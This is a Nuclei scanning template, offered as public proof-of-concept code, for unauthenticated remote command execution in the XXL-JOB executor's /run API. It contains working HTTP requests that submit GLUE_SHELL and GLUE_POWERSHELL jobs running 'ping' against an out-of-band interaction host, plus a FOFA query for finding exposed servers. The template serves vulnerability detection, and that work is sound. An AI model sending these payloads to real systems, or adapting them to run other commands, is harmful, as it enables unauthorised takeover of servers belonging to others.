XXL-JOB is a distributed task scheduling platform. Its core design goals are rapid development, easy learning, lightweight, and easy expansion. The source code is now open and connected to the online product lines of many companies, ready to use out of the box. XXL-JOB is divided into two ends: admin and executor. The former is the background management page, and the latter is the client for task execution. The executor is not configured with authentication by default, and unauthorized attackers can execute arbitrary commands through the RESTful API.
PoC代码[已公开]
id: xxljob-executor-unauth
info:
name: XXL-JOB executor - Unauthorized Access
author: k3rwin
severity: critical
description: |
XXL-JOB is a distributed task scheduling platform. Its core design goals are rapid development, easy learning, lightweight, and easy expansion. The source code is now open and connected to the online product lines of many companies, ready to use out of the box. XXL-JOB is divided into two ends: admin and executor. The former is the background management page, and the latter is the client for task execution. The executor is not configured with authentication by default, and unauthorized attackers can execute arbitrary commands through the RESTful API.
reference:
- https://github.com/jas502n/xxl-job/blob/main/README.md
- https://github.com/vulhub/vulhub/blob/master/xxl-job/unacc/README.md
classification:
cpe: cpe:2.3:a:xuxueli:xxl-job:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: xuxueli
product: xxl-job
fofa-query: app="XXL-JOB"
tags: xxljob,unauth,misconfig,rce,vuln
http:
- raw:
- |
POST /run HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Xxl-Job-Access-Token: default_token
Content-Length: 396
{
"jobId": {{rand_int(1000)}},
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 1,
"logDateTime": 1586629003729,
"glueType": "GLUE_SHELL",
"glueSource": "ping {{interactsh-url}}",
"glueUpdatetime": 1586699003758,
"broadcastIndex": 0,
"broadcastTotal": 0
}
- |
POST /run HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Xxl-Job-Access-Token: default_token
Content-Length: 396
{
"jobId": {{rand_int(1000)}},
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 1,
"logDateTime": 1586629003729,
"glueType": "GLUE_POWERSHELL",
"glueSource": "ping {{interactsh-url}}",
"glueUpdatetime": 1586699003758,
"broadcastIndex": 0,
"broadcastTotal": 0
}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"code":200}'
- type: status
status:
- 200
- type: word
part: interactsh_protocol
words:
- "dns"
# digest: 4a0a0047304502203309575269cfd4eb4fb8c357f9ec2e8bdc16af08dbae2aa25163258553ce0c85022100a814f3043ba0c2a263a5338059240498f32e737654d0d752b5feb1dc4da88339:922c64590222798bb761d5b6d8e72950